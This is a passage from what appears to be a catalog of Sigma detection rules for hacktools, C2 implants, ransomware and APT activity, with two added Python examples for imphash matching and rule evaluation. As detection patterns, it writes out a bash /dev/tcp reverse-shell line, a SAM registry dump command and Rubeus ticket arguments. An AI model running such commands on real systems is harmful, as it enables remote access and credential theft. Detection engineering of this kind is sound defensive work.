id: b1876533-4ed5-4a83-90f3-b8645840a413
status: test
description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
references:
    - https://github.com/GhostPack/SafetyKatz
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-20
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\SafetyKatz.exe'
        - OriginalFileName: 'SafetyKatz.exe'
        - Description: 'SafetyKatz'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HackTool - SecurityXploded Execution
Detects the execution of SecurityXploded Tools
view Sigma YAML
title: HackTool - SecurityXploded Execution
id: 7679d464-4f74-45e2-9e01-ac66c5eb041a
status: stable
description: Detects the execution of SecurityXploded Tools
references:
- https://securityxploded.com/
- https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-02-04
tags:
- attack.credential-access
- attack.t1555
logsource:
category: process_creation
product: windows
detection:
selection:
- Company: SecurityXploded
- Image|endswith: 'PasswordDump.exe'
- OriginalFileName|endswith: 'PasswordDump.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - SharpUp PrivEsc Tool Execution
Detects the use of SharpUp, a tool for local privilege escalation
view Sigma YAML
title: HackTool - SharpUp PrivEsc Tool Execution
id: c484e533-ee16-4a93-b6ac-f0ea4868b2f1
status: test
description: Detects the use of SharpUp, a tool for local privilege escalation
references:
- https://github.com/GhostPack/SharpUp
author: Florian Roth (Nextron Systems)
date: 2022-08-20
modified: 2023-02-13
tags:
- attack.persistence
- attack.privilege-escalation
- attack.discovery
- attack.execution
- attack.stealth
- attack.t1615
- attack.t1569.002
- attack.t1574.005
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\SharpUp.exe'
- Description: 'SharpUp'
- CommandLine|contains:
- 'HijackablePaths'
- 'UnquotedServicePath'
- 'ProcessDLLHijack'
- 'ModifiableServiceBinaries'
- 'ModifiableScheduledTask'
- 'DomainGPPPassword'
- 'CachedGPPPassword'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
HackTool - Sliver C2 Implant Activity Pattern
Detects process activity patterns as seen being used by Sliver C2 framework implants
view Sigma YAML
title: HackTool - Sliver C2 Implant Activity Pattern
id: 42333b2c-b425-441c-b70e-99404a17170f
status: test
description: Detects process activity patterns as seen being used by Sliver C2 framework implants
references:
- https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36
- https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-08-25
modified: 2023-03-05
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: '-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - SysmonEOP Execution
Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
view Sigma YAML
title: HackTool - SysmonEOP Execution
id: 8a7e90c5-fe6e-45dc-889e-057fe4378bd9
status: test
description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
references:
- https://github.com/Wh04m1001/SysmonEoP
author: Florian Roth (Nextron Systems)
date: 2022-12-04
modified: 2024-11-23
tags:
- cve.2022-41120
- attack.t1068
- attack.privilege-escalation
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith: '\SysmonEOP.exe'
selection_hash:
Hashes|contains:
- 'IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5'
- 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - Windows Credential Editor (WCE) Execution
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
It is often used by threat actors for credential dumping and lateral movement within compromised networks.
view Sigma YAML
title: HackTool - Windows Credential Editor (WCE) Execution
id: 7aa7009a-28b9-4344-8c1f-159489a390df
status: test
description: |
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
It is often used by threat actors for credential dumping and lateral movement within compromised networks.
references:
- https://www.ampliasecurity.com/research/windows-credentials-editor/
author: Florian Roth (Nextron Systems)
date: 2019-12-31
modified: 2025-10-21
tags:
- attack.credential-access
- attack.t1003.001
- attack.s0005
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith:
- '\WCE.exe'
- '\WCE64.exe'
selection_hash:
Hashes|contains:
- 'IMPHASH=136F0A8572C058A96436C82E541E4C41'
- 'IMPHASH=589657C64DDE88533186C39F82FA1F50'
- 'IMPHASH=6BFE09EFCB4FFDE061EBDBAFC4DB84CF'
- 'IMPHASH=7D490037BF450877E6D0287BDCFF8D2E'
- 'IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED'
- 'IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F'
- 'IMPHASH=BA434A7A729EEC20E136CA4C32D6C740'
- 'IMPHASH=BD1D1547DA13C0FCB6C15E86217D5EB8'
- 'IMPHASH=E96A73C7BF33A464C510EDE582318BF2'
condition: 1 of selection_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Hacktool Execution - Imphash
Detects the execution of different Windows-based hacktools via their import hash (imphash) even if the files have been renamed
view Sigma YAML
title: Hacktool Execution - Imphash
id: 24e3e58a-646b-4b50-adef-02ef935b9fc8
status: test
description: Detects the execution of different Windows-based hacktools via their import hash (imphash) even if the files have been renamed
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2022-03-04
modified: 2024-11-23
tags:
- attack.credential-access
- attack.resource-development
- attack.t1588.002
- attack.t1003
logsource:
category: process_creation
product: windows
detection:
selection:
Hashes|contains: # Sysmon field hashes contains all types
- IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam
- IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam
- IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam
- IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato
- IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato
- IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG
- IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato
- IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato
- IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato
- IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato
- IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump
- IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump
- IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump
- IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump
- IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump
- IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump
- IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump
- IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump
- IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump
- IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX
- IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump
- IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump
- IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump
- IMPHASH=730073214094CD328547BF1F72289752 # Htran
- IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons
- IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons
- IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons
- IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons
- IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump
- IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump
- IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump
- IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump
- IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump
- IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump
- IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump
- IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump
- IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump
- IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump
- IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump
- IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump
- IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump
- IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump
- IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump
- IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump
- IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump
- IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz
- IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz
- IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader
- IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader
- IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader
- IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader
- IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump
- IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi
- IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi
- IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi
- IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi
- IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi
- IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi
- IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi
- IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi
- IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi
- IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi
- IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi
- IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE
- IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE
- IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers
- IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert
- IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert
- IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert
- IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte
- IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet
- IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook
- IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz
- IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller
- IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller
- IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab
- IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab
- IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab
- IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia
- IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast
- IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast
- IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast
- IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast
- IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast
- IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast
- IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast
- IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer
- IMPHASH=B50199E952C875241B9CE06C971CE3C1 # EventLogCrasher
condition: selection
falsepositives:
- Legitimate use of one of these tools
level: critical
Convert to SIEM query
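The three imphash-based rules above (SysmonEOP, WCE and this one) depend on two things a hand-converted query can get wrong: where the IMPHASH value in the Sysmon `Hashes` field comes from, and how it is compared. The following is an added example, not code from this page or from the Sigma project. It derives an import hash from an import table the way pefile's `get_imphash()` does (DLL name lowercased with a .dll/.ocx/.sys extension stripped, symbol name lowercased, entries joined with commas in import-table order, MD5 of the result), parses Sysmon's comma-separated `Hashes` field, and compares case-insensitively, because Sigma's `contains` is case-insensitive and the rule above mixes upper- and lower-case values. The import table and the `Hashes` strings are constructed for illustration; the three IMPHASH values are copied from the rule above. One stated simplification: imports by ordinal are rendered as `ordN` for every DLL, whereas pefile resolves well-known ws2_32/wsock32/oleaut32 ordinals to their names.

```python
import hashlib

# Added example, not part of this page or the Sigma project. Derives an import
# hash the way pefile.get_imphash() does and compares it against the IMPHASH
# value of a Sysmon 'Hashes' field. Simplification: imports by ordinal become
# 'ordN' for every DLL; pefile resolves well-known ws2_32/wsock32/oleaut32
# ordinals to names before hashing.

_STRIPPED_EXTENSIONS = {"dll", "ocx", "sys"}


def imphash(imports):
    """imports: list of (dll_name, symbol) in import-table order; symbol is a str name or an int ordinal."""
    entries = []
    for dll, symbol in imports:
        lib = dll.lower()
        base, dot, ext = lib.rpartition(".")
        if dot and ext in _STRIPPED_EXTENSIONS:
            lib = base
        func = f"ord{symbol}" if isinstance(symbol, int) else symbol.lower()
        entries.append(f"{lib}.{func}")
    return hashlib.md5(",".join(entries).encode()).hexdigest()


def parse_hashes(hashes_field):
    """Sysmon 'Hashes' looks like 'SHA1=..,MD5=..,SHA256=..,IMPHASH=..'; return {ALG: VALUE}."""
    parsed = {}
    for part in hashes_field.split(","):
        algorithm, sep, value = part.partition("=")
        if sep and value:
            parsed[algorithm.strip().upper()] = value.strip().upper()
    return parsed


def matches_hacktool(hashes_field, known_imphashes):
    """Sigma 'contains' is case-insensitive, so normalise both sides before comparing."""
    value = parse_hashes(hashes_field).get("IMPHASH")
    return value is not None and value in {h.upper() for h in known_imphashes}


# Constructed import table of a hypothetical credential-dumping tool (illustrative only).
TOOL_IMPORTS = [
    ("KERNEL32.dll", "OpenProcess"),
    ("KERNEL32.dll", "ReadProcessMemory"),
    ("ADVAPI32.dll", "OpenProcessToken"),
    ("ADVAPI32.dll", "LookupPrivilegeValueW"),
    ("WS2_32.dll", 115),  # imported by ordinal
]

# IMPHASH values copied from the 'Hacktool Execution - Imphash' rule above.
RULE_IMPHASHES = [
    "BCCA3C247B619DCD13C8CDFF5F123932",  # PetitPotam
    "bf6223a49e45d99094406777eb6004ba",  # PetitPotam, lower case in the rule
    "A53A02B997935FD8EEDCB5F7ABAB9B9F",  # WCE, also listed in the WCE rule
]


def demo():
    """Show what re-ordering imports and case differences do to a match."""
    original = imphash(TOOL_IMPORTS)
    reordered = imphash(list(reversed(TOOL_IMPORTS)))
    return {
        "imphash": original,
        # Same imports in a different order give a different hash: the value is
        # tied to the compiled import table, not to the file name on disk.
        "reordering_imports_changes_hash": original != reordered,
        "rule_hit_upper": matches_hacktool("MD5=" + "0" * 32 + ",IMPHASH=BF6223A49E45D99094406777EB6004BA", RULE_IMPHASHES),
        "rule_hit_lower": matches_hacktool("IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f", RULE_IMPHASHES),
        # Constructed event from a Sysmon config without IMPHASH in HashAlgorithms.
        "no_imphash_logged": matches_hacktool("SHA256=" + "0" * 64, RULE_IMPHASHES),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two checks follow from this. Sysmon only writes an IMPHASH component when `HashAlgorithms` in its configuration includes IMPHASH (or `*`), so a converted query that never fires usually means the field is absent rather than the tool. And because the hash covers only the import table, a rebuilt, packed or import-stripped binary carries a different value, which is why these rules are stacked with name-, description- and command-line-based detections rather than used alone.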
critical
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
view Sigma YAML
title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
id: 3be82d5d-09fe-4d6a-a275-0d40d234d324
status: test
description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
references:
- https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
- https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
author: Florian Roth (Nextron Systems)
date: 2021-11-22
modified: 2022-12-25
tags:
- attack.privilege-escalation
- attack.t1068
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection:
Image|endswith: '\msiexec.exe'
TargetFilename|startswith: 'C:\Program Files (x86)\Microsoft\Edge\Application'
TargetFilename|endswith: '\elevation_service.exe'
condition: selection
falsepositives:
- Unknown
- Possibly some Microsoft Edge upgrades
level: critical
Convert to SIEM query
critical
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
view Sigma YAML
title: Lazarus Group Activity
id: 24c4d154-05a4-4b99-b57d-9b977472443a
related:
- id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
type: obsolete
status: test
description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
references:
- https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
- https://www.hvs-consulting.de/lazarus-report/
author: Florian Roth (Nextron Systems), wagga
date: 2020-12-23
modified: 2023-03-10
tags:
- attack.g0032
- attack.execution
- attack.t1059
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_generic:
CommandLine|contains:
- 'reg.exe save hklm\sam %temp%\~reg_sam.save'
- '1q2w3e4r@#$@#$@#$'
- ' -hp1q2w3e4 '
- '.dat data03 10000 -p '
selection_netstat:
CommandLine|contains|all:
- 'netstat -aon | find '
- 'ESTA'
- ' > %temp%\~'
# Network share discovery
selection_network_discovery:
CommandLine|contains|all:
- '.255 10 C:\ProgramData\IBM\'
- '.DAT'
selection_persistence:
CommandLine|contains|all:
- ' /c '
- ' -p 0x'
CommandLine|contains:
- 'C:\ProgramData\'
- 'C:\RECYCLER\'
selection_rundll32:
CommandLine|contains|all:
- 'rundll32 '
- 'C:\ProgramData\'
CommandLine|contains:
- '.bin,'
- '.tmp,'
- '.dat,'
- '.io,'
- '.ini,'
- '.db,'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Leviathan Registry Key Activity
Detects a registry key used by the Leviathan APT in a Malaysia-focused campaign
view Sigma YAML
title: Leviathan Registry Key Activity
id: 70d43542-cd2d-483c-8f30-f16b436fd7db
status: test
description: Detects a registry key used by the Leviathan APT in a Malaysia-focused campaign
references:
- https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign
author: Aidan Bracher
date: 2020-07-07
modified: 2023-09-19
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.001
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\Run\ntkd'
condition: selection
level: critical
Convert to SIEM query
critical
Linux Reverse Shell Indicator
Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
view Sigma YAML
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
category: network_connection
detection:
selection:
Image|endswith: '/bin/bash'
filter:
DestinationIp:
- '127.0.0.1'
- '0.0.0.0'
condition: selection and not filter
falsepositives:
- Unknown
level: critical
Convert to SIEM query
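The rules above between them use most of the selection grammar a converter has to get right: a list of mappings ORs its members (HackTool - Rubeus Execution), `contains|all` makes a value list conjunctive and two modifiers on the same field AND together (Lazarus Group Activity), `1 of selection_*` quantifies over selection names, and `selection and not filter` excludes values (this rule). What follows is an added example, not code from this page or from the Sigma project: a small Python evaluator for that subset that applies the Sigma specification's matching semantics (plain values are case-insensitive and honour `*` and `?` wildcards; `contains`, `startswith` and `endswith` are case-insensitive; `re` is a case-sensitive search) and runs abbreviated copies of those three rules over constructed events. The rule copies keep only a few of the original values, and the events are made up.

```python
import fnmatch
import re

# Added example, not part of this page or the Sigma project: a minimal evaluator
# for the subset of the Sigma detection grammar used by the rules above.


def match_value(field_value, pattern, modifiers):
    """One event field against one rule value, honouring Sigma modifier semantics."""
    if field_value is None:
        return False
    value, pattern = str(field_value), str(pattern)
    if "re" in modifiers:                       # 're' is case-sensitive by default
        return re.search(pattern, value) is not None
    value, pattern = value.lower(), pattern.lower()  # every other match is not
    if "contains" in modifiers:
        return pattern in value
    if "startswith" in modifiers:
        return value.startswith(pattern)
    if "endswith" in modifiers:
        return value.endswith(pattern)
    return fnmatch.fnmatchcase(value, pattern)  # plain value: '*' and '?' wildcards


def match_item(event, item):
    """A mapping: every 'field|modifiers: values' entry must hold (AND)."""
    for key, values in item.items():
        field, *modifiers = key.split("|")
        values = values if isinstance(values, list) else [values]
        hits = [match_value(event.get(field), v, modifiers) for v in values]
        if not (all(hits) if "all" in modifiers else any(hits)):
            return False
    return True


def match_selection(event, selection):
    """A selection is one mapping (AND) or a list of mappings (OR)."""
    if isinstance(selection, list):
        return any(match_item(event, item) for item in selection)
    return match_item(event, selection)


_TOKEN = re.compile(r"\(|\)|\b(?:and|or|not)\b|(?:1|all) of [\w*]+|\w+")


def evaluate(rule, event):
    """Evaluate rule['detection'] (selections plus condition) against a flat event."""
    detection = rule["detection"]
    names = [n for n in detection if n != "condition"]
    results = {n: match_selection(event, detection[n]) for n in names}
    parts = []
    for token in _TOKEN.findall(detection["condition"]):
        if token in ("and", "or", "not", "(", ")"):
            parts.append(token)
        elif " of " in token:                   # '1 of x*' / 'all of x*'
            quantifier, glob = token.split(" of ")
            joiner = " or " if quantifier == "1" else " and "
            parts.append("(" + joiner.join(str(results[n]) for n in fnmatch.filter(names, glob)) + ")")
        else:
            parts.append(str(results[token]))
    # Only True/False, and/or/not and parentheses reach eval, so this is safe.
    return bool(eval(" ".join(parts)))


# Abbreviated copies of three rules from this page (value lists trimmed).
RUBEUS = {"detection": {
    "selection": [
        {"Image|endswith": "\\Rubeus.exe"},
        {"OriginalFileName": "Rubeus.exe"},
        {"CommandLine|contains": ["kerberoast ", "ptt /ticket:", "asktgt /user:"]},
    ],
    "condition": "selection",
}}
LAZARUS = {"detection": {
    "selection_generic": {"CommandLine|contains": ["1q2w3e4r@#$@#$@#$", " -hp1q2w3e4 "]},
    "selection_netstat": {"CommandLine|contains|all": ["netstat -aon | find ", "ESTA", " > %temp%\\~"]},
    "condition": "1 of selection_*",
}}
REVERSE_SHELL = {"detection": {
    "selection": {"Image|endswith": "/bin/bash"},
    "filter": {"DestinationIp": ["127.0.0.1", "0.0.0.0"]},
    "condition": "selection and not filter",
}}

# Constructed events, not real telemetry.
SAMPLES = [
    ("renamed rubeus", RUBEUS, {"Image": "C:\\Temp\\svc.exe", "OriginalFileName": "Rubeus.exe",
                                "CommandLine": "svc.exe ptt /ticket:doIFREDACTED"}),
    ("benign cmd", RUBEUS, {"Image": "C:\\Windows\\System32\\cmd.exe", "OriginalFileName": "Cmd.Exe",
                            "CommandLine": "cmd /c dir"}),
    ("lazarus netstat", LAZARUS, {"CommandLine": 'cmd /c netstat -aon | find "ESTA" > %temp%\\~x.tmp'}),
    ("partial netstat", LAZARUS, {"CommandLine": "netstat -aon | find ESTA"}),
    ("bash reverse shell", REVERSE_SHELL, {"Image": "/usr/bin/bash", "DestinationIp": "10.0.0.1"}),
    ("bash to localhost", REVERSE_SHELL, {"Image": "/usr/bin/bash", "DestinationIp": "127.0.0.1"}),
]


def run_samples():
    """Return {label: verdict} for the constructed events."""
    return {label: evaluate(rule, event) for label, rule, event in SAMPLES}


if __name__ == "__main__":
    for label, verdict in run_samples().items():
        print(f"{'ALERT' if verdict else 'ok   '} {label}")
```

The point to carry over to a real backend is the case handling: every non-`re` comparison in Sigma is case-insensitive, so a conversion that emits case-sensitive `LIKE` or `endswith` operators will miss a renamed `RUBEUS.EXE` or an upper-cased `ESTA`, while the `re` values stay case-sensitive unless the rule says `re|i`.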
critical
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
view Sigma YAML
title: LockerGoga Ransomware Activity
id: 74db3488-fd28-480a-95aa-b7af626de068
status: stable
description: Detects LockerGoga ransomware activity via specific command line.
references:
- https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a
- https://blog.f-secure.com/analysis-of-lockergoga-ransomware/
- https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/
author: Vasiliy Burov, oscd.community
date: 2020-10-18
modified: 2023-02-03
tags:
- attack.impact
- attack.t1486
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: '-i SM-tgytutrc -s'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Mailbox Export to Exchange Webserver
Detects a successful export of an Exchange mailbox to an untypical directory or with an .aspx name suffix, which can be used to place a webshell, or the role assignment needed for it
view Sigma YAML
title: Mailbox Export to Exchange Webserver
id: 516376b4-05cd-4122-bae0-ad7641c38d48
status: test
description: Detects a successful export of an Exchange mailbox to an untypical directory or with an .aspx name suffix, which can be used to place a webshell, or the role assignment needed for it
references:
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
author: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)
date: 2021-08-09
modified: 2023-04-30
tags:
- attack.persistence
- attack.t1505.003
logsource:
service: msexchange-management
product: windows
detection:
export_command:
'|all':
- 'New-MailboxExportRequest'
- ' -Mailbox '
export_params:
- '-FilePath "\\\\' # We care about any share location.
- '.aspx'
role_assignment:
'|all':
- 'New-ManagementRoleAssignment'
- ' -Role "Mailbox Import Export"'
- ' -User '
condition: (export_command and export_params) or role_assignment
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Malicious DLL Load By Compromised 3CXDesktopApp
Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp
view Sigma YAML
title: Malicious DLL Load By Compromised 3CXDesktopApp
id: d0b65ad3-e945-435e-a7a9-438e62dd48e9
related:
- id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2
type: similar
- id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH
type: similar
- id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2
type: similar
- id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2
type: similar
- id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec
type: similar
- id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc
type: similar
- id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update
type: similar
status: test
description: Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp
references:
- https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-31
modified: 2024-11-23
tags:
- detection.emerging-threats
- attack.stealth
logsource:
category: image_load
product: windows
detection:
selection:
Hashes|contains:
# ffmpeg.dll
- 'SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896'
- 'SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429'
- 'MD5=74BC2D0B6680FAA1A5A76B27E5479CBC'
# d3dcompiler_47.dll
- 'SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03'
- 'SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E'
- 'MD5=82187AD3F0C6C225E2FBA0C867280CC9'
# Inner object from ffmpeg.dll
- 'SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952'
- 'SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30'
- 'MD5=11BC82A9BD8297BD0823BCE5D6202082'
# ICONIC Stealer payload
- 'SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423'
- 'SHA1=3B3E778B647371262120A523EB873C20BB82BEAF'
